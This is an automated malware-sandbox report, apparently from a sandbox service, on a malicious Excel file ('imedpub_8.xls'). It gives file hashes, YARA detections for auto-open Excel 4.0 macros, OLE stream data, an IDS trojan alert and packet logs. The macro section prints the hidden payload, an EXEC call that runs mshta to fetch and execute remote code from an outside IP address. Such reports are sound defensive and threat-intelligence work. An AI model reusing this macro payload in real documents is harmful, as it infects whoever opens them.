SSDEEP:	768:wvsk3hbdlylKsgqopeJBWhZFGkE+cMLxAAIZNSEVLG:w0k3hbdlylKsgqopeJBWhZFGkE+cMLx3
MD5:	06A30014EFAE12913C829BE85DD271EC
SHA1:	D19ADB2B308E5BC2C3E102DA72B2C22ADAF7563D
SHA-256:	2ACF233FC4C70929CE7081E3F9C544AD26656E9AC8BC64B25AA9B0CCCABA05C9
SHA-512:	E8BBC35960CC00962E744169521B702DD3C0B35BC248D4E3968DDCA9585BF21D0B43169F34EED7DF06426B4995E61653F5DD0F882F6F058FB6A010D708B0D279
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms. (copy)

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	8016
Entropy (8bit):	3.5788999137578306
Encrypted:	false
SSDEEP:	96:chQC4MqHkqvsqvJCwozz8hQC4MqHkqvsEHyqvJCworhzKAYHhHQUVXEWlUV9A2:cmJLozz8mJfHnorhzKTKUVXELA2
MD5:	1DC801BAB39D408109341647BDCD7F14
SHA1:	61B8376E7F522ED6A12EA719A1CAAF6EB42F49D8
SHA-256:	B8819F4401917BECC49B77023CF3C55403473D86B6A8C8E26AE504615EE81997
SHA-512:	0CE91DCBAFC7E1FBBD93868C249FBB03AEE8EE32E2A2B744F98F53362A6D0443985D51B756367167E0ECB9BAD208F3865600DE100645FCFEABA15BC940375544
Malicious:	false
Preview:	...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J\|v. MICROS~1..@.......:..~J\|v...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;..........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......S ...Programs..f.......:...S ....................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr....................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,....=....................W.i.n.d.o.w.s.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\X5Z6VJ3ODJ5VBJVEIRD5.temp

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	8016
Entropy (8bit):	3.5788999137578306
Encrypted:	false
SSDEEP:	96:chQC4MqHkqvsqvJCwozz8hQC4MqHkqvsEHyqvJCworhzKAYHhHQUVXEWlUV9A2:cmJLozz8mJfHnorhzKTKUVXELA2
MD5:	1DC801BAB39D408109341647BDCD7F14
SHA1:	61B8376E7F522ED6A12EA719A1CAAF6EB42F49D8
SHA-256:	B8819F4401917BECC49B77023CF3C55403473D86B6A8C8E26AE504615EE81997
SHA-512:	0CE91DCBAFC7E1FBBD93868C249FBB03AEE8EE32E2A2B744F98F53362A6D0443985D51B756367167E0ECB9BAD208F3865600DE100645FCFEABA15BC940375544
Malicious:	false
Preview:	...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J\|v. MICROS~1..@.......:..~J\|v...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;..........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......S ...Programs..f.......:...S ....................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr....................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,....=....................W.i.n.d.o.w.s.

C:\Users\user\Desktop\imedpub_8.xls

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Author: xXx, Last Saved By: xXx, Name of Creating Application: Microsoft Excel, Create Time/Date: Thu Jan 27 23:41:00 2022, Last Saved Time/Date: Fri Jan 28 06:31:03 2022, Security: 0
Category:	dropped
Size (bytes):	86528
Entropy (8bit):	7.100285491098866
Encrypted:	false
SSDEEP:	1536:g0k3hbdlylKsgqopeJBWhZFGkE+cMLxAAIzSEV2NnX4Ia3gg5W8IuD7PoHsP7e3F:g0k3hbdlylKsgqopeJBWhZFGkE+cMLxF
MD5:	9327C4424E99C81EA3EA275D76AB38F4
SHA1:	59129100286164B88FD2A2673E23A71D07687EE4
SHA-256:	F3CAA9710F8BF3AAC4E7C7584AD4023C00CCE6B06CEEBDF77C7B1CA2316248AC
SHA-512:	276FE9503E17018531220A06A0056B2620ACB782A07676B35966CF93E295E626AC103FC2ABB311F5ECC85BBE7F44FD543F700195C58CCBC408ED7AF527A2208C
Malicious:	true
Yara Hits:	Rule: SUSP_Excel4Macro_AutoOpen, Description: Detects Excel4 macro use with auto open / close, Source: C:\Users\user\Desktop\imedpub_8.xls, Author: John Lambert @JohnLaTwC Rule: JoeSecurity_XlsWithMacro4, Description: Yara detected Xls With Macro 4.0, Source: C:\Users\user\Desktop\imedpub_8.xls, Author: Joe Security
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................ZO..........................\.p....user B.....a.........=...........................................=........p.08.......X.@...........".......................1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1.*.h...6........<..C.a.l.i.b.r.i. .L.i.g.h.t.1.

Static File Info

General

File type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Author: xXx, Last Saved By: xXx, Name of Creating Application: Microsoft Excel, Create Time/Date: Thu Jan 27 23:41:00 2022, Last Saved Time/Date: Fri Jan 28 06:31:03 2022, Security: 0
Entropy (8bit):	7.086706619145403
TrID:	Microsoft Excel sheet (30009/1) 78.94% Generic OLE2 / Multistream Compound File (8008/1) 21.06%
File name:	imedpub_8.xls
File size:	86777
MD5:	e5e714cb6407688c4d57a5ac96c09047
SHA1:	8f46f78706d2530efb3e8b2fb843bf7baef60cab
SHA256:	a62bbd0c4dd80047a998ef3fe2670658ee890ffed8ad7775539967b665e2d001
SHA512:	022dba2ddcd4b4e7756899f08847cd8349e8b2bd91633fe257675648eb13a0af1c688fbb1e79a902c6e16b1574f3a9de32c094ed96d52861565d721ea4d702a1
SSDEEP:	1536:H0k3hbdlylKsgqopeJBWhZFGkE+cMLxAAIzSEV2NnX4Ia3gg5W8IuD7PoHsP7e3/:H0k3hbdlylKsgqopeJBWhZFGkE+cMLxz
File Content Preview:	........................>......................................................................................................................................................................................................................................

File Icon


Icon Hash:	e4eea286a4b4bcb4

Static OLE Info

General

Document Type:	OLE
Number of OLE Files:	1

OLE File "imedpub_8.xls"

Indicators

Has Summary Info:	True
Application Name:	Microsoft Excel
Encrypted Document:	False
Contains Word Document Stream:	False
Contains Workbook/Book Stream:	True
Contains PowerPoint Document Stream:	False
Contains Visio Document Stream:	False
Contains ObjectPool Stream:
Flash Objects Count:
Contains VBA Macros:	True

Summary

Code Page:	1251
Author:	xXx
Last Saved By:	xXx
Create Time:	2022-01-27 23:41:00
Last Saved Time:	2022-01-28 06:31:03
Creating Application:	Microsoft Excel
Security:	0

Document Summary

Document Code Page:	1251
Thumbnail Scaling Desired:	False
Company:
Contains Dirty Links:	False
Shared Document:	False
Changed Hyperlinks:	False
Application Version:	1048576

Streams

Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096

General
Stream Path:	\x5DocumentSummaryInformation
File Type:	data
Stream Size:	4096
Entropy:	0.324918127833
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . P . . . . . . . X . . . . . . . d . . . . . . . l . . . . . . . t . . . . . . . \| . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . R E E E E E E E E . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . .
Data Raw:	fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 f4 00 00 00 09 00 00 00 01 00 00 00 50 00 00 00 0f 00 00 00 58 00 00 00 17 00 00 00 64 00 00 00 0b 00 00 00 6c 00 00 00 10 00 00 00 74 00 00 00 13 00 00 00 7c 00 00 00 16 00 00 00 84 00 00 00 0d 00 00 00 8c 00 00 00 0c 00 00 00 ad 00 00 00

Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096

General
Stream Path:	\x5SummaryInformation
File Type:	data
Stream Size:	4096
Entropy:	0.263079431268
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x X x . . . . . . . . . x X x . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . N . V . . . . @ . . . . - - . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 04 00 00 00

Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 76002

General
Stream Path:	Workbook
File Type:	Applesoft BASIC program data, first line number 16
Stream Size:	76002
Entropy:	7.62172227998
Base64 Encoded:	True
Data ASCII:	. . . . . . . . Z O . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . x X x B . . . . . a . . . . . . . . . = . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . . . . p . 0 8 . . . . . . . X . @ . . . . . . . . . . . " . . . . . . . . .
Data Raw:	09 08 10 00 00 06 05 00 5a 4f cd 07 c9 00 02 00 06 08 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 03 00 00 78 58 78 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

Macro 4.0 Code

Name:	REEEEEEEE
Type:	3
Final:	False
Visible:	False
Protected:	False
REEEEEEEE3False0Falsepost2,2,=EXEC("CMD.EXE /c mshta http://91.240.118.172/gg/ff/fe.html")5,2,=HALT()

Name:	REEEEEEEE
Type:	3
Final:	False
Visible:	False
Protected:	False
REEEEEEEE3False0Falsepre2,2,=EXEC("CMD.EXE /c mshta http://91.240.118.172/gg/ff/fe.html")5,2,=HALT()

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
01/28/22-20:58:34.140470	TCP	2034631	ET TROJAN Maldoc Activity (set)	49166	80	192.168.2.22	91.240.118.172

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 28, 2022 20:58:29.283057928 CET	49165	80	192.168.2.22	91.240.118.172
Jan 28, 2022 20:58:29.341985941 CET	80	49165	91.240.118.172	192.168.2.22
Jan 28, 2022 20:58:29.342158079 CET	49165	80	192.168.2.22	91.240.118.172
Jan 28, 2022 20:58:29.342793941 CET	49165	80	192.168.2.22	91.240.118.172
Jan 28, 2022 20:58:29.401585102 CET	80	49165	91.240.118.172	192.168.2.22
Jan 28, 2022 20:58:29.402276993 CET	80	49165	91.240.118.172	192.168.2.22
Jan 28, 2022 20:58:29.402317047 CET	80	49165	91.240.118.172	192.168.2.22
Jan 28, 2022 20:58:29.402357101 CET	80	49165	91.240.118.172	192.168.2.22
Jan 28, 2022 20:58:29.402394056 CET	49165	80	192.168.2.22	91.240.118.172
Jan 28, 2022 20:58:29.402399063 CET	80	49165	91.240.118.172	192.168.2.22
Jan 28, 2022 20:58:29.402432919 CET	49165	80	192.168.2.22	91.240.118.172
Jan 28, 2022 20:58:29.402443886 CET	80	49165	91.240.118.172	192.168.2.22
Jan 28, 2022 20:58:29.402462959 CET	49165	80	192.168.2.22	91.240.118.172
Jan 28, 2022 20:58:29.402487040 CET	80	49165	91.240.118.172	192.168.2.22
Jan 28, 2022 20:58:29.402503967 CET	49165	80	192.168.2.22	91.240.118.172
Jan 28, 2022 20:58:29.402528048 CET	80	49165	91.240.118.172	192.168.2.22
Jan 28, 2022 20:58:29.402554035 CET	49165	80	192.168.2.22	91.240.118.172
Jan 28, 2022 20:58:29.402571917 CET	80	49165	91.240.118.172	192.168.2.22
Jan 28, 2022 20:58:29.402574062 CET	49165	80	192.168.2.22	91.240.118.172
Jan 28, 2022 20:58:29.402606010 CET	80	49165	91.240.118.172	192.168.2.22
Jan 28, 2022 20:58:29.402631998 CET	80	49165	91.240.118.172	192.168.2.22
Jan 28, 2022 20:58:29.402640104 CET	49165	80	192.168.2.22	91.240.118.172
Jan 28, 2022 20:58:29.402662039 CET	49165	80	192.168.2.22	91.240.118.172
Jan 28, 2022 20:58:29.402704000 CET	49165	80	192.168.2.22	91.240.118.172
Jan 28, 2022 20:58:29.423748016 CET	49165	80	192.168.2.22	91.240.118.172
Jan 28, 2022 20:58:34.075831890 CET	49166	80	192.168.2.22	91.240.118.172
Jan 28, 2022 20:58:34.137269974 CET	80	49166	91.240.118.172	192.168.2.22
Jan 28, 2022 20:58:34.137376070 CET	49166	80	192.168.2.22	91.240.118.172
Jan 28, 2022 20:58:34.140470028 CET	49166	80	192.168.2.22	91.240.118.172
Jan 28, 2022 20:58:34.201698065 CET	80	49166	91.240.118.172	192.168.2.22
Jan 28, 2022 20:58:34.202456951 CET	80	49166	91.240.118.172	192.168.2.22
Jan 28, 2022 20:58:34.202501059 CET	80	49166	91.240.118.172	192.168.2.22
Jan 28, 2022 20:58:34.202646971 CET	49166	80	192.168.2.22	91.240.118.172
Jan 28, 2022 20:58:34.276338100 CET	49167	80	192.168.2.22	164.90.147.135
Jan 28, 2022 20:58:37.292212009 CET	49167	80	192.168.2.22	164.90.147.135
Jan 28, 2022 20:58:43.298949957 CET	49167	80	192.168.2.22	164.90.147.135
Jan 28, 2022 20:58:44.513869047 CET	49165	80	192.168.2.22	91.240.118.172
Jan 28, 2022 20:58:55.414619923 CET	49168	80	192.168.2.22	103.206.244.105
Jan 28, 2022 20:58:55.599175930 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:55.599543095 CET	49168	80	192.168.2.22	103.206.244.105
Jan 28, 2022 20:58:55.599576950 CET	49168	80	192.168.2.22	103.206.244.105
Jan 28, 2022 20:58:55.783878088 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:55.793814898 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:55.793844938 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:55.793876886 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:55.793893099 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:55.793905973 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:55.793919086 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:55.793926001 CET	49168	80	192.168.2.22	103.206.244.105
Jan 28, 2022 20:58:55.793936968 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:55.793956995 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:55.793957949 CET	49168	80	192.168.2.22	103.206.244.105
Jan 28, 2022 20:58:55.793970108 CET	49168	80	192.168.2.22	103.206.244.105
Jan 28, 2022 20:58:55.793976068 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:55.793992996 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:55.794100046 CET	49168	80	192.168.2.22	103.206.244.105
Jan 28, 2022 20:58:55.972629070 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:55.972661018 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:55.972676992 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:55.972693920 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:55.972709894 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:55.972726107 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:55.972742081 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:55.972753048 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:55.972765923 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:55.972781897 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:55.972798109 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:55.972804070 CET	49168	80	192.168.2.22	103.206.244.105
Jan 28, 2022 20:58:55.972814083 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:55.972831011 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:55.972835064 CET	49168	80	192.168.2.22	103.206.244.105
Jan 28, 2022 20:58:55.972841024 CET	49168	80	192.168.2.22	103.206.244.105
Jan 28, 2022 20:58:55.972853899 CET	49168	80	192.168.2.22	103.206.244.105
Jan 28, 2022 20:58:55.972882986 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:55.972914934 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:55.972928047 CET	49168	80	192.168.2.22	103.206.244.105
Jan 28, 2022 20:58:55.972930908 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:55.972948074 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:55.972965956 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:55.972969055 CET	49168	80	192.168.2.22	103.206.244.105
Jan 28, 2022 20:58:55.973165035 CET	49168	80	192.168.2.22	103.206.244.105
Jan 28, 2022 20:58:56.154421091 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:56.154453039 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:56.154474020 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:56.154491901 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:56.154504061 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:56.154515982 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:56.154529095 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:56.154541969 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:56.154557943 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:56.154567003 CET	49168	80	192.168.2.22	103.206.244.105
Jan 28, 2022 20:58:56.154571056 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:56.154589891 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:56.154608011 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:56.154632092 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:56.154649019 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:56.154666901 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:56.154684067 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:56.154701948 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:56.154717922 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:56.154726982 CET	49168	80	192.168.2.22	103.206.244.105
Jan 28, 2022 20:58:56.154736042 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:56.154753923 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:56.154771090 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:56.154787064 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:56.154803991 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:56.154812098 CET	49168	80	192.168.2.22	103.206.244.105
Jan 28, 2022 20:58:56.154819965 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:56.154836893 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:56.154861927 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:56.154877901 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:56.154894114 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:56.154910088 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:56.154927015 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:56.154942989 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:56.154964924 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:56.154977083 CET	49168	80	192.168.2.22	103.206.244.105
Jan 28, 2022 20:58:56.154982090 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:56.155000925 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:56.155015945 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:56.155033112 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:56.155049086 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:56.155065060 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:56.155210018 CET	49168	80	192.168.2.22	103.206.244.105
Jan 28, 2022 20:58:56.155430079 CET	49168	80	192.168.2.22	103.206.244.105
Jan 28, 2022 20:58:56.333190918 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:56.333221912 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:56.333237886 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:56.333254099 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:56.333267927 CET	49168	80	192.168.2.22	103.206.244.105
Jan 28, 2022 20:58:56.333270073 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:56.333287954 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:56.333292961 CET	49168	80	192.168.2.22	103.206.244.105
Jan 28, 2022 20:58:56.333306074 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:56.333323002 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:56.333329916 CET	49168	80	192.168.2.22	103.206.244.105
Jan 28, 2022 20:58:56.333339930 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:56.333357096 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:56.333359003 CET	49168	80	192.168.2.22	103.206.244.105
Jan 28, 2022 20:58:56.333374023 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:56.333391905 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:56.333395004 CET	49168	80	192.168.2.22	103.206.244.105
Jan 28, 2022 20:58:56.333409071 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:56.333424091 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:56.333436012 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:56.333446026 CET	49168	80	192.168.2.22	103.206.244.105
Jan 28, 2022 20:58:56.333450079 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:56.333458900 CET	49168	80	192.168.2.22	103.206.244.105
Jan 28, 2022 20:58:56.333466053 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:56.333482027 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:56.333484888 CET	49168	80	192.168.2.22	103.206.244.105
Jan 28, 2022 20:58:56.333498955 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:56.333514929 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:56.333517075 CET	49168	80	192.168.2.22	103.206.244.105
Jan 28, 2022 20:58:56.333530903 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:56.333549023 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:56.333551884 CET	49168	80	192.168.2.22	103.206.244.105
Jan 28, 2022 20:58:56.333565950 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:56.333581924 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:56.333585024 CET	49168	80	192.168.2.22	103.206.244.105
Jan 28, 2022 20:58:56.333600044 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:56.333615065 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:56.333619118 CET	49168	80	192.168.2.22	103.206.244.105
Jan 28, 2022 20:58:56.333632946 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:56.333647013 CET	49168	80	192.168.2.22	103.206.244.105
Jan 28, 2022 20:58:56.333650112 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:56.333667040 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:56.333682060 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:56.333684921 CET	49168	80	192.168.2.22	103.206.244.105
Jan 28, 2022 20:58:56.333698988 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:56.333714008 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:56.333717108 CET	49168	80	192.168.2.22	103.206.244.105
Jan 28, 2022 20:58:56.333730936 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:56.333745956 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:56.333746910 CET	49168	80	192.168.2.22	103.206.244.105
Jan 28, 2022 20:58:56.333762884 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:56.333777905 CET	49168	80	192.168.2.22	103.206.244.105
Jan 28, 2022 20:58:56.333779097 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:56.333795071 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:56.333811045 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:56.333812952 CET	49168	80	192.168.2.22	103.206.244.105
Jan 28, 2022 20:58:56.333842993 CET	49168	80	192.168.2.22	103.206.244.105
Jan 28, 2022 20:58:56.512391090 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:56.512423992 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:56.512440920 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:56.512458086 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:56.512475014 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:56.512491941 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:56.512510061 CET	80	49168	103.206.244.105	192.168.2.22
Jan 28, 2022 20:58:56.512526989 CET	49168	80	192.168.2.22	103.206.244.105
Jan 28, 2022 20:58:56.512526989 CET	80	49168	103.206.244.105	192.168.2.22
